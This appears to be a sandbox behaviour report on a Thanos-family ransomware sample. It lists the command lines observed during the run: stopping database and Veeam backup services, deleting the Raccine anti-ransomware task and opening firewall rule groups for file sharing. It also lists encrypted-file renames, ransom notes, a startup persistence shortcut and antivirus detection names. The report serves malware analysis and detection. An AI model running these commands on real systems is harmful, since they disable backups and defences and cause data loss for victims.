cmdline | "net.exe" stop MSSQL$SQL_2008 /y |
cmdline | "schtasks" /DELETE /TN "Raccine Rules Updater" /F |
cmdline | "net.exe" stop SQLBrowser /y |
cmdline | "net.exe" stop audioendpointbuilder /y |
cmdline | "net.exe" stop “Veeam Backup Catalog Data Service” /y |
cmdline | "net.exe" stop bedbg /y |
cmdline | "net.exe" stop “intel(r) proset monitoring service” /y |
host | 172.217.25.14 |
file | C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt |
file | C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt.y9sx7x |
file | C:\Windows\Sandboxie.ini |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\Application.etl |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppOobe.etl |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppSetup.log |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Uninstall.log |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppSetupResult.ini |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\EppSetup.etl |
file | C:\Users\All Users\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Install.log |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk |
cmdline | "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes |
cmdline | "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes |
file | C:\Python27\agent.pyw |
file | C:\tmpzdcjvb\analyzer.py |
file | C:\Windows\bootstat.dat |
file | C:\Python27\tcl\tcl8.5\encoding\iso2022-kr.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-3.enc |
file | C:\Python27\tcl\tcl8.5\encoding\euc-cn.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp857.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macIceland.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macCyrillic.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-8.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp860.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macGreek.enc |
file | C:\Python27\tcl\tcl8.5\encoding\ksc5601.enc |
file | C:\Python27\tcl\tcl8.5\encoding\gb12345.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp1254.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp1255.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-2.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp949.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp437.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp775.enc |
file | C:\Python27\tcl\tcl8.5\encoding\big5.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp936.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp869.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-5.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-9.enc |
file | C:\Python27\tcl\tcl8.5\encoding\ascii.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macRoman.enc |
file | C:\Python27\tcl\tcl8.5\encoding\gb1988.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-15.enc |
file | C:\Python27\tcl\tcl8.5\encoding\ebcdic.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macThai.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp865.enc |
file | C:\Python27\tcl\tcl8.5\encoding\shiftjis.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macCentEuro.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp850.enc |
file | C:\Python27\tcl\tcl8.5\encoding\jis0212.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp1251.enc |
file | C:\Python27\tcl\tcl8.5\encoding\euc-jp.enc |
file | C:\Python27\tcl\tcl8.5\encoding\euc-kr.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp863.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso2022-jp.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macTurkish.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-1.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp866.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macRomania.enc |
file | C:\Python27\tcl\tcl8.5\encoding\jis0201.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macDingbats.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-4.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp1250.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp862.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp864.enc |
file | C:\Python27\tcl\tcl8.5\encoding\koi8-r.enc |
file | C:\Python27\tcl\tcl8.5\encoding\koi8-u.enc |
file | C:\Users\test22\AppData\Local\Temp\RESTORE_FILES_INFO.txt |
file | C:\Users\test22\Desktop\RESTORE_FILES_INFO.txt |
file | C:\Python27\Lib\site-packages\MouseInfo-0.1.3-py2.7.egg-info\requires.txt.y9sx7x |
file | C:\Python27\tcl\tix8.4.3\pref\Blue.cs.y9sx7x |
file | C:\Python27\tcl\tix8.4.3\bitmaps\textfile.gif.y9sx7x |
file | C:\Python27\Lib\site-packages\setuptools-41.2.0.dist-info\dependency_links.txt.y9sx7x |
file | C:\Python27\click\click_image\ok1.png.y9sx7x |
file | C:\Python27\Lib\test\cjkencodings\euc_jisx0213.txt.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\fa_ir.msg.y9sx7x |
file | C:\Python27\Lib\test\talos-2019-0758.pem.y9sx7x |
file | C:\Python27\tcl\tcl8.5\tzdata\Pacific\Auckland.y9sx7x |
file | C:\Python27\Lib\email\test\data\msg_34.txt.y9sx7x |
file | C:\Python27\Lib\test\audiodata\pluck-pcm32.wav.y9sx7x |
file | C:\Python27\tcl\tk8.5\images\logoLarge.gif.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\hr.msg.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\es_do.msg.y9sx7x |
file | C:\Python27\Lib\site-packages\pip\_vendor\certifi\cacert.pem.y9sx7x |
file | C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\sq.msg.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\en_ie.msg.y9sx7x |
file | C:\util\ProcessMonitor\Eula.txt.y9sx7x |
file | C:\Python27\Lib\test\cjkencodings\iso2022_kr-utf8.txt.y9sx7x |
file | C:\Python27\Lib\email\test\data\msg_10.txt.y9sx7x |
file | C:\Python27\Lib\test\imghdrdata\python.gif.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\fa_in.msg.y9sx7x |
file | C:\Python27\click\click_image\attach.png.y9sx7x |
file | C:\Python27\tcl\tcl8.5\tzdata\Asia\Ulaanbaatar.y9sx7x |
file | C:\Python27\Lib\test\keycert.pem.y9sx7x |
file | C:\Python27\Lib\email\test\data\msg_28.txt.y9sx7x |
file | C:\Python27\Lib\email\test\data\msg_12.txt.y9sx7x |
file | C:\Python27\Lib\test\testtar.tar.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\bn_in.msg.y9sx7x |
file | C:\Python27\Lib\email\test\data\msg_07.txt.y9sx7x |
file | C:\Python27\Lib\site-packages\MouseInfo-0.1.3-py2.7.egg-info\installed-files.txt.y9sx7x |
file | C:\Python27\Lib\test\ffdh3072.pem.y9sx7x |
file | C:\Python27\tcl\tcl8.5\tzdata\Turkey.y9sx7x |
file | C:\Python27\Lib\email\test\data\msg_25.txt.y9sx7x |
file | C:\Python27\click\click_image\msi1.png.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\en_zw.msg.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\es_mx.msg.y9sx7x |
file | C:\Python27\click\click\click_image\exec.png.y9sx7x |
file | C:\Python27\tcl\tix8.4.3\bitmaps\act_fold.gif.y9sx7x |
file | C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.y9sx7x |
file | C:\Users\test22\Documents\ZJxEeTZHFgUo.txt.y9sx7x |
file | C:\Python27\Lib\email\test\data\msg_16.txt.y9sx7x |
file | C:\Python27\Lib\test\imghdrdata\python.jpg.y9sx7x |
file | C:\Python27\click\click_image\exec.png.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\ta.msg.y9sx7x |
file | C:\Python27\Lib\email\test\data\msg_02.txt.y9sx7x |
file | C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.y9sx7x |
file | C:\Python27\tcl\tcl8.5\msgs\gl_es.msg.y9sx7x |
file | C:\Python27\tcl\tix8.4.3\bitmaps\minusarm.gif.y9sx7x |
Elastic | malicious (high confidence) |
DrWeb | Trojan.EncoderNET.31368 |
Qihoo-360 | Win32/Ransom.Generic.HgIASRUA |
McAfee | Ransom-Thanos!B4282C7F3FA9 |
Cylance | Unsafe |
Sangfor | Trojan.Win32.Save.a |
Alibaba | Trojan:MSIL/Filecoder.da633c3b |
Cybereason | malicious.a406fa |
BitDefenderTheta | Gen:NN.ZemsilF.34628.fm0@aepBvip |
Cyren | W32/A-770b6427!Eldorado |
Symantec | ML.Attribute.HighConfidence |
APEX | Malicious |
Avast | Win32:RansomX-gen [Ransom] |
Kaspersky | HEUR:Trojan-Ransom.MSIL.Crypren.gen |
Paloalto | generic.ml |
TrendMicro | Ransom.MSIL.THANOS.SM |
McAfee-GW-Edition | BehavesLike.Win32.Generic.nh |
FireEye | Generic.mg.b4282c7f3fa918a4 |
Sophos | Mal/Generic-S + Mal/Hakbit-A |
SentinelOne | Static AI - Malicious PE |
Webroot | W32.Trojan.MSIL.Crypren |
Avira | HEUR/AGEN.1141108 |
Kingsoft | Win32.Troj.Undef.(kcloud) |
Microsoft | Backdoor:Win32/Bladabindi!ml |
Gridinsoft | Ransom.Win32.AI.oa |
AegisLab | Trojan.MSIL.Crypren.j!c |
GData | Win32.Trojan-Ransom.Filecoder.KFL0RV@gen |
Cynet | Malicious (score: 100) |
AhnLab-V3 | Malware/Win32.RL_Generic.C4219461 |
Malwarebytes | Malware.AI.2022078683 |
ESET-NOD32 | a variant of MSIL/Filecoder.Thanos.A |
TrendMicro-HouseCall | Ransom.MSIL.THANOS.SM |
Rising | Ransom.Crypren!8.1D6C (CLOUD) |
Ikarus | Win32.Outbreak |
eGambit | Unsafe.AI_Score_95% |
Fortinet | MSIL/Thanos.A!tr.ransom |
AVG | Win32:RansomX-gen [Ransom] |
Panda | Trj/GdSda.A |
CrowdStrike | win/malicious_confidence_100% (W) |